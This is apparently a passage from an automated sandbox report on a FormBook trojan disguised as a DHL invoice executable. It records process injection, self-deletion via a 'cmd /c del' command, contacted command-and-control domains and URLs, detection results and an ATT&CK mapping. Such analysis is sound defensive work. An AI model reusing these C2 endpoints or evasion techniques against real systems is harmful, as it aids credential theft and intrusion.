          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: explorer.exe, 00000005.00000000.403617766.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.398386364.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364857450.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396982165.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425085384.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383606390.00000000008B8000.00000004.00000020.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 532858 Sample: invoice dhl.delivery docume... Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 9 other signatures 2->42 10 invoice dhl.delivery document and original invoice sign.exe 3 2->10         started        process3 file4 28 invoice dhl.delive...nvoice sign.exe.log, ASCII 10->28 dropped 54 Injects a PE file into a foreign processes 10->54 14 invoice dhl.delivery document and original invoice sign.exe 10->14         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.mimamincloor.com 17->30 32 www.federaldados.design 17->32 34 pixie.porkbun.com 44.227.76.166, 49792, 80 AMAZON-02US United States 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 msdt.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          invoice dhl.delivery document and original invoice sign.exe29%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.cuteprofessionalscrubs.com/9gr5/0%Avira URL Cloudsafe
          http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ==0%Avira URL Cloudsafe
          http://federaldados.design0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pixie.porkbun.com
          		44.227.76.166
          		truefalse
            		high
            www.mimamincloor.com
            		unknown
            		unknowntrue
              		unknown
              www.federaldados.design
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.cuteprofessionalscrubs.com/9gr5/true
                • Avira URL Cloud: safe
                		low
                http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ==true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmpfalse
                  		high
                  http://federaldados.designmsdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  44.227.76.166
                  		pixie.porkbun.comUnited States
                  		16509AMAZON-02USfalse

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:532858
                  Start date:02.12.2021
                  Start time:18:56:21
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 11m 8s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:invoice dhl.delivery document and original invoice sign.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:24
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@7/1@2/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 10.1% (good quality ratio 9%)
                  • Quality average: 69.7%
                  • Quality standard deviation: 32.8%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 92.122.145.220
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532858/sample/invoice dhl.delivery document and original invoice sign.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:57:23API Interceptor1x Sleep call for process: invoice dhl.delivery document and original invoice sign.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  44.227.76.166draft_inv dec21.exeGet hashmaliciousBrowse
                  • www.apps365.one/n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p
                  GV20.xlsxGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?g2=3MX+rG6qdMdpgj3vkcjGUKQb8RZ/Wti45jKeFUgZ8Sp9kre80Lf7BBErzfoB75v9CaDIsg==&cL30r=9rotn4JHoV3ltP8
                  DHL Documents.exeGet hashmaliciousBrowse
                  • www.dazzlehide.com/how6/?l2Jl=zrWVDLIDcIqBKRYG1UA+Wpo4WhIstAWIPVtKBtZyKgnKFq7ePhcu8NeTnhol46ILoLGp&Tf5pq=W6zlk8Rp
                  InfoDoc-TGT23.xlsxGet hashmaliciousBrowse
                  • www.motan.one/e9gd/?kbMpZrx=1Tx/x2BtnTfqhKNFsgzrN2ChDpvRrwmThrJ1L/NufEAFSHMFfBw+pnINnQuUZ1NWw2fceQ==&1b=iHN83
                  Tax payment invoice - Wed, November 10, 2021,pdf.exeGet hashmaliciousBrowse
                  • www.auribunk.com/e3rs/?mf=TRvZRMAw3lsKUL9CXC8eqAI5bRo13x6FqkgJspROms4gTvW8iipg2M7S/NGvrxuIEdWN&Nzut=7ni4n2oPNjQ
                  Quote request.exeGet hashmaliciousBrowse
                  • www.dietjakarta.com/s2qi/?B4Zpg=n2MLk&TJELpfLP=qOzazkHAVvIGDra8b9OWW7CQPYry4NAftY2oZLUdYfYDTW+xNyVbwU9NOeXebbzy0cbp
                  HCCuazHtYM.exeGet hashmaliciousBrowse
                  • www.kisah.xyz/sywu/?Wdcl=USn/s/Nyq2IB4uI+SZdH7vYZi5cG3dzFHZJ6S+kDyK7ak+Qptb1BIkroqQUbeC08Hzvk&f0=6lux
                  AhsMBcI8HE.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?FDK=8pHld4yh&IBZp=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw5kHwI72X83/
                  EyCIJOX8SE.exeGet hashmaliciousBrowse
                  • www.zerw2.com/q36e/?7nAP7b=Rntl1NDFA6KYRcsqazHh+Zc5uliS6OLgFgzbWqR6HwMZQd5uPPAwi9BbZn8pw0w7Jz4p&2dxhP=9rl0db
                  Purchase Order_pdf.exeGet hashmaliciousBrowse
                  • www.sharpabode.com/m46c/?vZY8T=cbYwwDYfq0EA1/dzvh5+5q31ws3piQ0R8cWk1s43hoFTk6H0f8stk5G5Q6DD0FZfegy9&eDKpqJ=4hlLdHAHW
                  Jrc9iR2XxH.exeGet hashmaliciousBrowse
                  • www.cerulecode.com/fpdi/?HfW=Y4i9pRfqC0VEN73682mG/jD+Vu59I4hEkdMs70p216zZ0VDsaaS5oQ0h3VnsQu+aBNhS&SF=4huTiLj0U
                  Purchase Order-10,000MT.exeGet hashmaliciousBrowse
                  • www.brunchy.one/z4m5/?0BZ=zNPWEz3pIEHibvS4bsIXDPiznK4rKMrVGAhmY+HWnOPy3ASb809gbr8Dwg2gtflOJLni&GrTx=OBZlGh08BLVtF
                  Draft shipping docs CI+PL.xlsxGet hashmaliciousBrowse
                  • www.innoattic.com/bs8f/?cB=g8xx_j&8p=gPvbgkUuDHvxuJMOi3Tla1oGEdPTt04jzJFwq+zy+XCPeJFywCVHj+bsawhRKX7OnQxPtw==
                  INQ No.KP-30-00-PS-PI-INQ-0044.exeGet hashmaliciousBrowse
                  • www.keenlodge.com/z4m5/?IbWD=IxgNhcPCMNp9bV879hJPaVaLt/F9tNvz+B8dWaixPZ5v/4GUpiSAT9d+tp3lIab/iqeX&u48=-ZxdAxW
                  1908790.exeGet hashmaliciousBrowse
                  • www.fleetizer.com/fg6s/?6lUXCh2=IckWWdKyCvbUOE8Ak+7kGAJP2dTotOIdi/VcdgZTnhZBerDYh6qAkCj/DPMztv+2yYxp&oL3Lu=a4mDHl20kLKlY
                  eLL1MVwOME.exeGet hashmaliciousBrowse
                  • www.kisah.xyz/sywu/?BR=USn/s/Nyq2IB4uI+SZdH7vYZi5cG3dzFHZJ6S+kDyK7ak+Qptb1BIkroqQUxByE8Dxnk&bN90g=JTsp4zoP3f
                  IRFdB0zpoK.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?GJEXK=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&Zl=5jBl74npBZ
                  PpyXtBdTaF.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?o0GTN=cL3PcjiPVroHY&0VltihtH=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4
                  9QqkVnhDbm.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?4h68ir=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&n2=YHstuLSPt
                  bPlX6IObw2.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?aJExY=5juP-hz0rVndupn&W488=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6E9gZbONbW4

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  pixie.porkbun.comEyCIJOX8SE.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  TRJViVkvTr.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Production Inquiry.xlsxGet hashmaliciousBrowse
                  • 44.227.65.245
                  NEW ORDER.docGet hashmaliciousBrowse
                  • 44.227.65.245
                  BIN.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  v02dyhbaq5.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  TT COPY_11010089.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  I6B6iC23da.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  08-14.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  Swift Copy.xlsxGet hashmaliciousBrowse
                  • 44.227.76.166
                  VESSEL BOOKING DETAILS_pdf.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  OoBepaLH3W.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  INVOICES.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  Transfer Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  productos.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  QxVf0A9SFT.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Inv_7623980.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Inv_7623980.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Tlz3P6ra10.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Order210622.exeGet hashmaliciousBrowse
                  • 44.227.76.166

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  AMAZON-02USoeOZvHnuaUGet hashmaliciousBrowse
                  • 54.171.230.55
                  Milleniumbpc.xlsxGet hashmaliciousBrowse
                  • 44.231.165.140
                  PQPv91RexGGet hashmaliciousBrowse
                  • 34.249.145.219
                  WAYBILL 44 7611 9546 - Joao Carlos.exeGet hashmaliciousBrowse
                  • 75.2.115.196
                  HBL No_PZU100035300.xlsxGet hashmaliciousBrowse
                  • 3.64.163.50
                  ufKi6DmWMQCuEb4.exeGet hashmaliciousBrowse
                  • 3.108.154.143
                  yVvATSvedsfMg0l.exeGet hashmaliciousBrowse
                  • 3.64.163.50
                  'Vm Note'ar_dept On Wed, 01 Dec 2021 220320 +0100.htmlGet hashmaliciousBrowse
                  • 52.84.148.85
                  EmployeeAssessment.htmlGet hashmaliciousBrowse
                  • 108.157.4.48
                  bUSzS84fr4.dllGet hashmaliciousBrowse
                  • 205.251.242.103
                  M72Kclc67w.dllGet hashmaliciousBrowse
                  • 13.225.75.74
                  5jsO2t1pju.dllGet hashmaliciousBrowse
                  • 13.225.75.74
                  4bndVtKthy.dllGet hashmaliciousBrowse
                  • 13.225.75.74
                  8frEuSow0b.exeGet hashmaliciousBrowse
                  • 13.58.157.220
                  dDGwIMJCU9.exeGet hashmaliciousBrowse
                  • 3.22.15.135
                  NtJEv6gABB.exeGet hashmaliciousBrowse
                  • 3.22.15.135
                  e6o8rHLN98.exeGet hashmaliciousBrowse
                  • 3.22.15.135
                  Poh Tiong Trading - products list.exeGet hashmaliciousBrowse
                  • 52.209.14.22
                  dowNext.dllGet hashmaliciousBrowse
                  • 13.224.92.74
                  'Vm Note'usename On Wed, 01 Dec 2021 192129 +0100.htmlGet hashmaliciousBrowse
                  • 13.224.96.22

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.log
                  Process:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1310
                  Entropy (8bit):5.345651901398759
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                  MD5:D918C6A765EDB90D2A227FE23A3FEC98
                  SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                  SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                  SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                  Static File Info

